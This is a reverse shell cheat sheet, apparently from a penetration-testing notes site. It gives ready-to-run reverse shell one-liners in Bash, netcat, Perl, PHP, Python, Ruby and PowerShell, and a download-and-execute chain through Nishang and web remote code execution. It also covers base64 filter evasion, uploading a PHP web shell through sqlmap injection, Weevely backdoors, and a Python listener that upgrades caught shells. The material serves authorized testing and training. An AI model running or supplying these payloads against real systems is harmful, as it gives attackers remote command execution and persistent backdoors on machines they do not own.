Reverse Shell Cheat Sheet
Last modified: 2023-03-10
Preparation
First of all, start a listener on the local (attacker) machine to catch the incoming connection. The address 10.0.0.1 and port 4444 used throughout this page are placeholders for that machine's IP and the listener port.
nc -lvnp 4444
Cheat Sheets
Bash
bash -i >& /dev/tcp/10.0.0.1/4444 0>&1
bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'
/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'
# For a URL parameter: spaces become + and & must be %26, otherwise the server reads & as a query-string separator and truncates the command (encoding > as %3E as well is safer)
bash+-i+>%26+/dev/tcp/10.0.0.1/4444+0>%261
Netcat OpenBSD
rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4444 >/tmp/f
Ncat
ncat 10.0.0.1 4444 -e /bin/bash
ncat 10.0.0.1 4444 -e /bin/sh
ncat 10.0.0.1 4444 -c bash
ncat --udp 10.0.0.1 4444 -e /bin/bash
# -e/-c also work with traditional netcat (netcat-traditional); the OpenBSD nc has neither, so use the mkfifo one-liner above there
nc 10.0.0.1 4444 -e /bin/bash
nc 10.0.0.1 4444 -e /bin/sh
nc 10.0.0.1 4444 -c bash
nc -u 10.0.0.1 4444 -e /bin/bash
Perl
perl -e 'use Socket;$i="10.0.0.1";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
-
Script File
If we want to pass a script file to the perl binary instead of using -e, create a Perl script as follows (the one-liner above is Perl, so the file is run with perl, not php).
# shell.pl
use Socket;
$i="10.0.0.1";
$p=4444;
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))){
  open(STDIN,">&S");
  open(STDOUT,">&S");
  open(STDERR,">&S");
  exec("/bin/sh -i");
};
Then run perl.
perl ./shell.pl
PHP
# Assumes the socket becomes file descriptor 3 (true when no other descriptors are open); use the pentestmonkey shell below if it does not
php -r '$sock=fsockopen("10.0.0.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
Python
python -c 'import socket,os,pty;s=socket.socket();s.connect(("10.0.0.1", 4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'
python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("10.0.0.1", 4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'
Ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
PowerShell
# The TCPClient must be assigned to $client (later lines use it), and the whole -Command argument has to be quoted
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
powershell.exe -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Nishang
Nishang is a collection of offensive PowerShell scripts for red teaming and penetration testing; its Shells directory contains ready-made reverse shell functions.
-
Preparing the Payload in Your Local Machine
First off, copy the payload to the current working directory.
cp /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 .
mv Invoke-PowerShellTcp.ps1 shell.ps1
Append the following line to the end of the payload (shell.ps1), so the function is invoked as soon as the script is loaded on the target.
Invoke-PowerShellTcp -Reverse -IPAddress <your-local-ip> -Port 4444
-
Opening a Web Server on Your Local Machine
To let the target download the payload and execute the reverse shell, serve the directory containing shell.ps1 from your local machine.
python3 -m http.server 8000
-
Downloading the Payload and Executing Reverse Shell
On the target machine, download the locally hosted payload and run the reverse shell (the nc listener on port 4444 must already be running).
cmd /c powershell IEX (New-Object Net.WebClient).DownloadString('http://<your-local-ip>:8000/shell.ps1')
Reverse Shell with Base64
First create the base64 of the command that executes the reverse shell (-w0 stops GNU base64 from wrapping long output at 76 columns).
echo -n 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1' | base64 -w0
Then copy the base64 text and paste it into the payload. The encoded string contains only A-Z, a-z, 0-9, +, / and =, so it passes filters that block spaces, quotes or redirection characters; if it is sent in a URL parameter, + and = still need to be encoded as %2B and %3D.
echo -n "<Base64>" | base64 -d | bash
Reverse Shell over Websites
Shell Script & Remote Code Execution (RCE)
If we find a website vulnerable to Remote Code Execution but cannot get a reverse shell directly (for example because the one-liner's special characters are filtered or mangled), we may still be able to get one by uploading a script and executing it.
-
Create a shell script to reverse shell.
This file is named "revshell.sh".
#!/bin/bash
bash -i >& /dev/tcp/<local-ip>/<local-port> 0>&1
-
Upload the script to website
Start a web server on the local machine to serve the script.
python3 -m http.server 8000
Then download it onto the target through the remote code execution (the file lands in the working directory of the web server process, which must be writable).
https://vulnerable.com/?cmd=wget http://<local-ip>:8000/revshell.sh
# or
https://vulnerable.com/?cmd=curl -O http://<local-ip>:8000/revshell.sh
To confirm the script was downloaded, run a directory listing through the RCE.
https://vulnerable.com/?cmd=ls
-
Get a shell
Start a listener on the local machine to catch the shell.
nc -lvnp 4444
Now execute the uploaded script via the RCE.
# 1. Make the script executable
https://vulnerable.com/?cmd=chmod 777 revshell.sh
# 2. Execute the script
https://vulnerable.com/?cmd=./revshell.sh
We should now get a shell on the target. The second request stays pending in the browser for as long as the shell is alive, because the web server is waiting for the command to finish.
PHP Reverse Shell
php-reverse-shell (by pentestmonkey) is a well-known reverse shell payload for websites running PHP.
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O shell.php
Update `$ip` and `$port` near the top of the payload to your local IP and listener port.
Then upload the payload, or paste its contents into a PHP file you can write on the target, and request that page in a browser; the shell connects back while the request is being served.
PHP Reverse Shell (without fsockopen, and for FreeBSD)
<?php
set_time_limit (0);
$ip = '10.0.0.1'; // CHANGE THIS
$port = 4444; // CHANGE THIS
// Spawn a shell process; the reverse shell itself is the mkfifo/nc one-liner
// from the Netcat OpenBSD section, so this works where fsockopen() is disabled
$descriptorspec = array(
  0 => array("pipe", "r"), // stdin is a pipe that the child will read from
  1 => array("pipe", "w"), // stdout is a pipe that the child will write to
  2 => array("file", "/tmp/error-output.txt", "a") // stderr is appended to a file
);
$cwd = "/tmp";
$env = array('some_option' => 'aeiou'); // environment handed to the child; the value is irrelevant
$process = proc_open('sh', $descriptorspec, $pipes, $cwd, $env);
if (is_resource($process)) {
  // double quotes so $ip and $port are interpolated; in single quotes nc would receive the literal text "$ip $port"
  fwrite($pipes[0], "rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ip $port >/tmp/f");
  fclose($pipes[0]);
  echo stream_get_contents($pipes[1]);
  fclose($pipes[1]);
  $return_value = proc_close($process);
  echo "command returned $return_value\n";
}
?>
PHP Reverse Shell for Windows
We can get the payload here.
Upload the Payload using SQLi
# req.txt: the raw HTTP request saved from Burp Suite; --file-write is the local payload, --file-dest its absolute path inside the target's web root
# Writing files needs a database user that is allowed to (e.g. MySQL FILE privilege, with secure_file_priv not restricting the destination)
sqlmap -r req.txt --dbs --random-agent --batch --file-dest=/var/www/html/shell.php --file-write=./shell.php
Useful Tools
-
Weevely
A PHP web shell generator and client.
-
Generate Backdoor with Password
The generated backdoor only responds to requests that carry the password chosen here.
weevely generate <password> ./shell.php
-
Upload the Payload to Target Website and Execute Commands
weevely https://vulnerable.com/upload/shell.php <password> whoami
-
Get a Shell
weevely https://vulnerable.com/upload/shell.php <password>
-
Pwncat
Pwncat (pwncat-cs) is a reverse and bind shell handler that also automates the post-connection work, such as the TTY upgrade described below.
To listen for the incoming connection, run the following command.
pwncat-cs -lp 4444
Commands in Pwncat Shell
Once the reverse connection lands, we can run commands in either the local pwncat prompt or the remote shell.
# Switch between the local (pwncat) and remote shell
Ctrl+D
# Upload a file to the target machine (e.g. example.txt from local to remote)
(local) upload ./example.txt /tmp/example.txt
Upgrade to a Full Functional Shell
After catching the reverse shell, it is recommended to upgrade it to a proper interactive TTY; without one, tools such as su, sudo and editors fail or behave oddly. Either of the following spawns a pseudo-terminal on the target.
SHELL=/bin/bash script -q /dev/null
# or
python3 -c 'import pty; pty.spawn("/bin/bash")'
The following steps turn it into a fully interactive terminal (job control, tab completion, and Ctrl+C that interrupts the remote command instead of killing the listener).
# 1. Background the listener (nc) on the local machine
Ctrl+z
# 2. Put the local terminal into raw mode, then bring the listener back to the foreground
stty raw -echo;fg
# 3. Press Enter twice to get the prompt back
Enter x2
# 4. Tell the remote shell what kind of terminal it is talking to
export TERM=xterm
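The manual recipe above is what a shell handler automates. The following listener is an added example for this cheat sheet (not code from the original page and not pwncat's implementation): it waits for a reverse connection on a port of your choosing, sends the pty.spawn line, the window size and TERM to the target, and then switches the local terminal to raw mode and relays bytes in both directions, which is the programmatic equivalent of Ctrl+z, stty raw -echo;fg. It assumes python3 (or, as a fallback, script) exists on the target and that the listener runs in a real terminal on Linux/macOS.

```python
#!/usr/bin/env python3
"""Catch a reverse shell and apply the TTY-upgrade recipe automatically.

Added example: not the cheat sheet's own code and not pwncat. Assumes python3
or script(1) on the target. Usage: python3 catch.py 4444, then fire any
reverse shell from this page at it.
"""
import os
import select
import socket
import sys
import termios
import time
import tty


def upgrade_commands(rows, cols, term="xterm"):
    """Commands sent to the target right after it connects, in order: spawn a
    pty (falling back to script(1) if python3 is missing), then set the window
    size and TERM so pagers and editors render correctly."""
    return [
        "python3 -c 'import pty; pty.spawn(\"/bin/bash\")' || SHELL=/bin/bash script -q /dev/null",
        f"stty rows {rows} columns {cols}",
        f"export TERM={term}",
    ]


def relay(conn, stdin_fd=None, stdout_fd=None):
    """Bridge the socket and the local terminal byte for byte. Raw mode on the
    local tty is what 'stty raw -echo; fg' does by hand: Ctrl+C, Ctrl+Z and Tab
    now reach the remote pty instead of being interpreted locally."""
    stdin_fd = sys.stdin.fileno() if stdin_fd is None else stdin_fd
    stdout_fd = sys.stdout.fileno() if stdout_fd is None else stdout_fd
    saved = termios.tcgetattr(stdin_fd)
    tty.setraw(stdin_fd)
    try:
        while True:
            ready, _, _ = select.select([conn, stdin_fd], [], [])
            if conn in ready:
                data = conn.recv(4096)
                if not data:
                    break                      # remote shell exited
                os.write(stdout_fd, data)
            if stdin_fd in ready:
                data = os.read(stdin_fd, 4096)
                if not data:
                    break
                conn.sendall(data)
    finally:
        termios.tcsetattr(stdin_fd, termios.TCSADRAIN, saved)  # restore terminal


def serve(port):
    """Listen once, upgrade the shell, then hand the terminal over to relay()."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("0.0.0.0", port))
    srv.listen(1)
    print(f"[*] listening on 0.0.0.0:{port}", file=sys.stderr)
    conn, peer = srv.accept()
    print(f"[+] connection from {peer[0]}:{peer[1]}", file=sys.stderr)
    try:
        size = os.get_terminal_size()
    except OSError:                            # not attached to a terminal
        size = os.terminal_size((80, 24))
    # A short pause after the first line gives the pty bash time to start, so
    # the stty/TERM lines are read by it and not by the original dumb shell.
    for cmd in upgrade_commands(size.lines, size.columns):
        conn.sendall((cmd + "\n").encode())
        time.sleep(1)
    relay(conn)
    conn.close()


if __name__ == "__main__":
    serve(int(sys.argv[1]) if len(sys.argv) > 1 else 4444)
```

Start it in place of nc -lvnp 4444; when the shell exits, relay() restores the local terminal settings so the attacker's own shell is not left in raw mode, the most common complaint after a botched manual upgrade.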